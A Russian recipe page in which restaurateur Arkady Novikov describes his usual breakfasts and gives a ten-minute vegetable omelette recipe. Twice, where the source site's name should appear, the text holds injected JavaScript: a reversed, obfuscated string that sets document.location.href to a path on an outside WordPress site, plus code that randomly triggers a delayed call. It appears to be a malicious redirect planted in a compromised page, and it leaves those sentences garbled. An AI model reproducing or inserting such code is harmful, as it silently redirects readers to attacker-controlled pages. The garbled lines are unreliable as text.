Как обычно по воскресеньям мы делимся с вами рецептами тех, кого считаем героями и друзьями fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru. Сегодня о своём любимом завтраке рассказывает один из лучших рестораторов страны Аркадий Новиков. Удивительно, но по утрам он тоже ест яичницу.
Фото: novikovgroup.ru
Аркадий Новиков
российский ресторатор, предприниматель, владелец Novikov Group (а это более 50 ресторанных проектов)
— Чаще всего на завтрак я ем либо сырники, либо яичницу. Готовлю всё самостоятельно — для меня это не составляет особого труда. Если на приготовление сырников уходит около получаса, то с яичницей справляюсь моментально: «болтушку» и глазунью могу сделать минуты за три—четыре, а яичницу с овощами — максимум за десять.
Яичница с овощами
Фото: foodgawker.com
Яичница с овощами на завтрак: рецепт от Аркадия Новикова
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
10 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
1
КАЛОРИЙНОСТЬ:
175
175 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Яйцо
2 шт.
Помидоры
2 шт.
Цуккини
100 г
Огурец
100 г
Лук
50 г
Чеснок
по вкусу
Кинза
по вкусу
Соль
по вкусу
Перец чёрный молотый
по вкусу
Растительное масло
по вкусу
- Хорошенько разогрейте сковороду, налейте в неё масло и обжарьте лук. Затем добавьте в сковороду предварительно нарезанные овощи и тушите их на небольшом огне, постоянно помешивая. Слегка посолите и поперчите, добавьте чеснок и зелень.
- Освободите ложкой место на сковородке и вбейте туда яйца.
- Закройте сковородку крышкой и жарьте на низком огне в течение пяти минут.
- При желании сверху украсьте блюдо зеленью — и яичница готова. Приятного аппетита!